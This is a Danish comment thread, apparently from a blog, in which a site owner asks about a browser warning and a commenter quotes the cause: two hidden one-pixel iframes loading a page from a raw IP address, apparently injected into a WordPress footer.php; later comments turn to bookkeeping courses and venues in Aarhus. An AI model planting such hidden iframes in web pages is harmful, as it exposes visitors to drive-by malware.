Ja det tilbud kommer i nok ikke så langt med. Jeg får denne her smidt i hovedet hvis jeg prøver at besøger siden
Og jeg vil bestemt mene at det er dette lille stykke kode der er skyld i fejlen. <iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe><iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>
Nej fejlen er IKKE! fjernet endnu! - Du kan smide en mail på Thomas@aboutweb.dk så skal jeg fjerne den, og lukket evt sikkerhedshuller i din wordpress så det ikke sker igen. Men det er ikke gratis. Hvis du selv har modet så må du jo begynde at kigge i din footer.php fil, men det vil hurtigt komme tilbage hvis du ikke får lukket hullet der er brugt til tvinge sig adgang med
Har fundet fejlen :)
Desværre er der en del forskellige der har været inde over mit projekt den seneste måned, så har netop ændret password til WP samt FTP.
Tak for Jeres hjælp.
DBH Martin
Jeres kurser (basic og lager) virker meget attraktive, specielt når man får et 3 måneders licens oveni prisen :-)
Under basic kurset skriver I: - 3 måneders ubegrænset support på e-conomic - 3 måneders ubegrænset bogførings hjælp
Nu er ubegrænset et meget bredt ord. Kan du være mere specifik? Det er vel kun i henhold til brugen af e-conomic og ikke hvis man er i tvivl hvor en post skal bogføres?
Endelig er jeg ked af at læse, at der ingen kurser er planlagt i Århus... Er det noget som I har planer om?
E-conomic har en support som hjælper med "teknikken" - og det kan man bruge ubegrænset.
Og supporten på bogføring er ment som hjælp til poster - vi gennemgår det på kurset, og hvis man derefter har spørgsmål - når man sidder derhjemme så er det bare at skrive lige så meget som man vil:)
Det kommer - men problemet er at finde egnet lokaler - vi prioterer at det skal ligge central og tæt på offentlig transport. og selvfølgelig til en fornuftig pris for at vi kan holde priserne nede hvor de er nu..
Hvis der er nogen fra Århus som er interesseret så sig til :) - Vi har en aftale med Radisson hotellet i Århus. - alternativt kan vi tilbyde samme løsning som for fyn, med en betalt togtur til København :)